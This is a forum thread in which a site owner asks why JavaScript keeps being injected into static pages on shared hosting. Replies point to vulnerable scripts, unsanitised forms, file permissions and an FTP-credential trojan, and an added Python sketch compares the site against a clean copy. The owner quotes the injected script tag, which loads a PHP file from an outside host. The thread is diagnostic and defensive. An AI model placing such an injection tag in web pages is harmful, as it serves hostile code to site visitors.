Is Shared WebHosting A Security Risk

11 replies
This is the second time this year I have got automatic addition of JavaScript code inside my web pages; it automatically creates one PHP file inside the images folder too. May I know how to prevent and solve this problem, and what is the role of hosting companies in said situation?
#risk #security #shared #webhosting
  • TristanPerry
    Shared hosting in itself isn't a risk. Any proper shared host will secure the servers as necessary.

    Beyond that, are you sure that you aren't running any insecure applications? Are all your software installs up to date?

    It's a bit too difficult to answer your first question since there are thousands of different reasons why this may have happened. It could be the client's fault, or it could be the host's fault.

    To answer your last question - a host's security responsibility is in part to have a secure server and to ensure that the various accounts cannot affect each other's files etc.

    But keeping scripts up to date and all is the client's responsibility.
  • mywebwork
    As Tristan correctly pointed out, Shared Hosting itself isn't a greater security risk; a properly set up and maintained Apache virtual server can be made quite secure. However, there are other factors that can make Shared Hosting plans less reliable, all of them due to the "shared" aspect of the arrangement.

    The biggest concerns with shared hosting are regarding who exactly you are sharing it with! You share a common IP address, so if one of the domains on your server does something spammy, unethical or downright illegal, your shared IP address could end up on a few blacklists. This would affect things like e-mail deliverability if you use your own mail servers. Another concern is that one or two of the sites you share services with could eat up the majority of the bandwidth or CPU cycles, making your site slow and nonresponsive. As Google is now starting to consider response time in its ranking of sites, this could hurt you in more ways than one.

    A site like this one can show you who your "neighbors" are on your hosting plan. Just enter your domain name and see who else shares the same IP address as you:

    myIPneighbors.com Reverse IP Lookup & Domain Check DNS Tool

    Bill
  • n7 Studios
    Check all of your scripts that are on your web site immediately. If they're downloaded, check for available updates. Check file permissions, or get someone else to look at this if you don't understand.

    One or more of those has a vulnerability which someone has exploited to be able to write files to your web host. Leave this unfixed, and the chances are they'll be able to do much worse now they know how to access parts of your web site.
  • nRehman
    Thanks to all of you, it's really great to have your suggestions and views. As far as scripts and files, I have already blocked my blog and directory. I am only talking about the static pages that contain just one application form, about which I don't have any doubt. Moreover, I refreshed my static web pages with the newly uploaded files, but this time the illegal JavaScript appeared again but has changed its URL.

    Anyway, the question is where it has rooted itself. Do you have any idea?
  • SimonFairbairn
    If you have any upload, contact form or any other way of anonymous users adding data to your website then you need to make sure that it's thoroughly cleaned before you accept it. Any data that you are accepting from users - even just a simple contact form - needs to be treated with utmost suspicion as it's just not to be trusted.

    What's this application form you are talking about? A simple textarea is enough for someone to get some malicious code on your page if you're not cleaning it properly.

    If someone's placed a malicious script on your site, it could be anywhere. You'll need to go through your entire site directory - making sure that you are able to see all hidden files and folders - and look for something that doesn't look right.

    If you have a database, you'll need to go through all of the entries on that as well.

    Unfortunately, it's not the host's responsibility to make sure that your pages are properly secured, so they'll probably not be much help.

    Si
  • ninjawarrior
    Did you create those static files yourself, maybe using some sort of HTML editor perhaps? Some HTML editors include some JavaScript when you create HTML pages and some of them don't easily show up as JavaScript when you're in edit mode.

    Or perhaps somebody else made those pages for you and whatever that javascript is, it's supposed to enhance the page somehow.

    If you can provide more information regarding the javascript that gets included into your files that you speak of, somebody might be able to help you regarding your specific problem.

    Unless you're using FREE shared hosting, the javascript that gets auto included into your pages isn't normal practice nowadays by most shared hosting providers. Geocities used to do this, but that's an era of the internet that's way beyond what we'd call ancient history now.

    Hope this helps.
  • nRehman
    The problem that I am getting is called a "script injection". Said website has been online for 5 to 6 years. I have a clean copy here on my computer which always stays in a secure atmosphere. When I upload files to the server, these files stay clean for a few hours without any problem.

    Anyway, it embeds different URLs after every fresh upload before the body tag; this time it embeds:

    <script src=http://jvaflash.com/images/postinfo.php ></script>

    It also made one file in my "images" folder named "gifimg.php".

    Moreover, this problem was first seen last May, but when I uploaded a new fresh copy it was gone until now, but now it's not working.

    Do you think it may also be a problem with the database? I am not sure, but it started after building my blog with my domain.

    I also took a new hosting platform, but when I uploaded, it only took 24 hours to initiate its injection process, and within 10 seconds it reached my four sites on this server.
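Added example, not part of any post in this thread: a Python sketch of the check the post above makes possible, comparing the live site against the clean local copy to list files that were added (such as gifimg.php) or modified, and naming any new external script host in a modified page. The function names and the sample directory tree are constructed for illustration.

```python
import hashlib, os, re, tempfile
from urllib.parse import urlparse

# Captures the src of a <script> tag, quoted or unquoted as in the post.
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

def file_digests(root):
    """Map relative path -> SHA-256 for every file (os.walk includes dotfiles)."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                out[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def script_hosts(path):
    """Hosts of absolute script URLs in a file; relative src values have none."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        srcs = SCRIPT_SRC.findall(fh.read())
    return {urlparse(s).hostname for s in srcs} - {None}

def compare_to_clean(clean_root, live_root):
    """Return sorted (relative_path, finding) pairs for the live copy."""
    clean, live = file_digests(clean_root), file_digests(live_root)
    findings = [(rel, "missing from live copy") for rel in clean if rel not in live]
    for rel, digest in live.items():
        if rel not in clean:
            findings.append((rel, "added: not in clean copy"))
        elif digest != clean[rel]:
            new = script_hosts(os.path.join(live_root, rel)) \
                - script_hosts(os.path.join(clean_root, rel))
            note = "new script host " + ", ".join(sorted(new)) if new else "content differs"
            findings.append((rel, "modified: " + note))
    return sorted(findings)

def demo():
    """Constructed sample: a clean tree and a tampered copy as the post describes."""
    tag = b"<script src=http://jvaflash.com/images/postinfo.php ></script>"
    with tempfile.TemporaryDirectory() as tmp:
        for copy, extra in (("clean", b""), ("live", tag)):
            os.makedirs(os.path.join(tmp, copy, "images"))
            with open(os.path.join(tmp, copy, "index.html"), "wb") as fh:
                fh.write(b"<html>" + extra + b"<body>form</body></html>")
            with open(os.path.join(tmp, copy, "images", "logo.gif"), "wb") as fh:
                fh.write(b"GIF89a")
        with open(os.path.join(tmp, "live", "images", "gifimg.php"), "wb") as fh:
            fh.write(b"placeholder")  # stands in for the dropped file
        return compare_to_clean(os.path.join(tmp, "clean"), os.path.join(tmp, "live"))
```

Calling `compare_to_clean(clean_dir, live_dir)` on a fresh download of the site shows which files changed; it does not show how the change was made, which is what the FTP and web server logs are for.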
    • Gary Smith
      I don't suppose you're using FileZilla? It seems to be getting hit pretty hard recently by a trojan that grabs the ftp login details and then uses them to modify some of your files (it seems to be mainly index.php and index.html). I had a customer recently with 50-60 websites infected by this.

      It's a trojan on the PC that grabs those ftp login details and FileZilla don't have any plans to change the way ftp credentials are stored (they are currently stored in an unencrypted state). More info here:

      FileZilla Security Alert - Hacker Exploit Through Trojan | Tech-Evangelist
  • HomeComputerGames
    It sounds like your directory system needs locked down. By setting the correct permissions on your server you can ensure that no one but you can make any modifications.

    Also, checking the ftp logs will tell you if your account has been compromised.
    Your web server logs will tell you a lot about what is going on.

    It sounds like your form is the most likely culprit. That can be easily fixed but would need to see what the code is doing first.

    If you haven't got it sorted yet PM me and we'll see what we can work out.

    Ken
    • nRehman
      Originally posted by HomeComputerGames:

      It sounds like your directory system needs locked down. By setting the correct permissions on your server you can ensure that no one but you can make any modifications.

      Also, checking the ftp logs will tell you if your account has been compromised.
      Your web server logs will tell you a lot about what is going on.

      It sounds like your form is the most likely culprit. That can be easily fixed but would need to see what the code is doing first.

      If you haven't got it sorted yet PM me and we'll see what we can work out.

      Ken
      Dear Ken, thanks for your help, I will definitely write to you. Anyway, do you think an FTP program like "WS_FTP Professional 2006" is safe for uploading files, because I mostly use it to upload my files?